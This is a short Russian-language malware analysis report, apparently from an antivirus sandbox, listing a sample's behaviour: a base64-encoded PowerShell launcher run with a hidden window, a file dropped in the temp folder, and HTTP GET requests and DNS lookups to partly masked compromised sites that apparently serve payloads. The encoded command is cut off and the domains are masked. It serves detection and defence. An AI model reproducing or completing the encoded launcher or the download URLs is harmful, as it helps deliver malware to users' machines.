Техническая информация
Вредоносные функции
Запускает на исполнение (эксплоит)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...
- '%CommonProgramFiles%\Microsoft Shared\DW\DW20.EXE' -x -s 1384
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\1056454.cvr
Сетевая активность
Подключается к
- 'ab#####dbelow.com.au':80
- 'am######erscreens.com.au':443
- 'at####eacademy.net':80
- 'at####eacademy.net':443
- 'ja#####ectronics.com':80
- 'ja#####ectronics.com':443
- 'in####igence.com.sg':80
- 'so#####sbrotinho.com.br':80
- 'so#####sbrotinho.com.br':443
TCP
Запросы HTTP GET
- http://ab#####dbelow.com.au/cgi-bin/Lbi20Tu/
- http://at####eacademy.net/wp-admin/VDDlV/
- http://www.ja#####ectronics.com/assets/TwgdI/
- http://in####igence.com.sg/registration/JGX3I/
- http://www.in####igence.com.sg/registration/JGX3I/
- http://so#####sbrotinho.com.br/novo/8edJm/
Другие
- 'am######erscreens.com.au':443
- 'at####eacademy.net':443
- 'ja#####ectronics.com':443
- 'so#####sbrotinho.com.br':443
UDP
- DNS ASK ab#####dbelow.com.au
- DNS ASK am######erscreens.com.au
- DNS ASK at####eacademy.net
- DNS ASK ja#####ectronics.com
- DNS ASK in####igence.com.sg
- DNS ASK so#####sbrotinho.com.br
- DNS ASK pr###ed.com.mx
Другое
Создает и запускает на исполнение
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e JABQADMAZAA4ADQAbgBpAD0AKAAnAFUAJwArACgAJwBmACcAKwAnADAAbQB3ACcAKwAnAHIAbAAnACkAKQA7AC4AKAAnAG4AZQB3AC0AaQAnACsAJwB0AGUAbQAnACkAIAAkAEUAbgBWADoAdABFAG0AcABcAFcATwByAEQAXAAyADAAMQA5AFwAIAAtAG...' (со скрытым окном)
